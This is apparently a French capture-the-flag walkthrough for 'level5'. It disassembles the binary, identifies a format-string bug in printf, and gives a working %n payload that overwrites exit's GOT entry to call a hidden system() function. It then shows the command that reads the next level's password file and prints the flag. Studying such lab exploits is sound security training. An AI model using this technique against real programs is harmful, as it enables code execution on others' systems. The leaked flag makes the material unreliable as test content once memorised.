Objdump nous montre:
080484a4 <o>:
 80484a4:	55                   	push   %ebp
 80484a5:	89 e5                	mov    %esp,%ebp
 80484a7:	83 ec 18             	sub    $0x18,%esp
 80484aa:	c7 04 24 f0 85 04 08 	movl   $0x80485f0,(%esp)
 80484b1:	e8 fa fe ff ff       	call   80483b0 <system@plt>
 80484b6:	c7 04 24 01 00 00 00 	movl   $0x1,(%esp)
 80484bd:	e8 ce fe ff ff       	call   8048390 <_exit@plt>

080484c2 <n>:
 80484c2:	55                   	push   %ebp
 80484c3:	89 e5                	mov    %esp,%ebp
 80484c5:	81 ec 18 02 00 00    	sub    $0x218,%esp
 80484cb:	a1 48 98 04 08       	mov    0x8049848,%eax
 80484d0:	89 44 24 08          	mov    %eax,0x8(%esp)
 80484d4:	c7 44 24 04 00 02 00 	movl   $0x200,0x4(%esp)
 80484db:	00
 80484dc:	8d 85 f8 fd ff ff    	lea    -0x208(%ebp),%eax
 80484e2:	89 04 24             	mov    %eax,(%esp)
 80484e5:	e8 b6 fe ff ff       	call   80483a0 <fgets@plt>
 80484ea:	8d 85 f8 fd ff ff    	lea    -0x208(%ebp),%eax
 80484f0:	89 04 24             	mov    %eax,(%esp)
 80484f3:	e8 88 fe ff ff       	call   8048380 <printf@plt>
 80484f8:	c7 04 24 01 00 00 00 	movl   $0x1,(%esp)
 80484ff:	e8 cc fe ff ff       	call   80483d0 <exit@plt>

08048504 <main>:
 8048504:	55                   	push   %ebp
 8048505:	89 e5                	mov    %esp,%ebp
 8048507:	83 e4 f0             	and    $0xfffffff0,%esp
 804850a:	e8 b3 ff ff ff       	call   80484c2 <n>
 804850f:	c9                   	leave
 8048510:	c3                   	ret

Fonction n() appelle gets, printf et exit
Fonction o() appelle system() sauf que personne ne l'apelle

Nous allons donc essayer de rediriger l'appel d'exit() sur la fonction o()

$> ./level5
AAAA%x%x%x%x
AAAA200b7fd1ac0b7ff37d041414141

L'offset est donc de 4 donc %4$n

Prenons l'adresse de o() 080484a4 puis on la convertit en decimal => 134513828
134513828 - 4 pour l'adresse = 134513824

Si on regarde cette ligne:
 80484ff:	e8 cc fe ff ff       	call   80483d0 <exit@plt>
En remontant on voit qu'il y a deux exit et seul un nous interesse donc on compare les adresses pour avoir le bon

Puis on va directement taper dans l'exit au niveau du jmp 0x8049838 en shellcode =>  \x38\x98\x04\x08

080483d0 <exit@plt>:
 80483d0:	ff 25 38 98 04 08    	jmp    *0x8049838
 80483d6:	68 28 00 00 00       	push   $0x28
 80483db:	e9 90 ff ff ff       	jmp    8048370 <_init+0x3c>

$> python -c "print '\x38\x98\x04\x08' + '%134513824c' + '%4\$n'" > /tmp/test5
$> cat /tmp/test5 - | ./level5
$> cat /home/user/level6/.pass
d3b7bf1025225bd715fa8ccb54ef06ca70b9125ac855aeab4878217177f41a31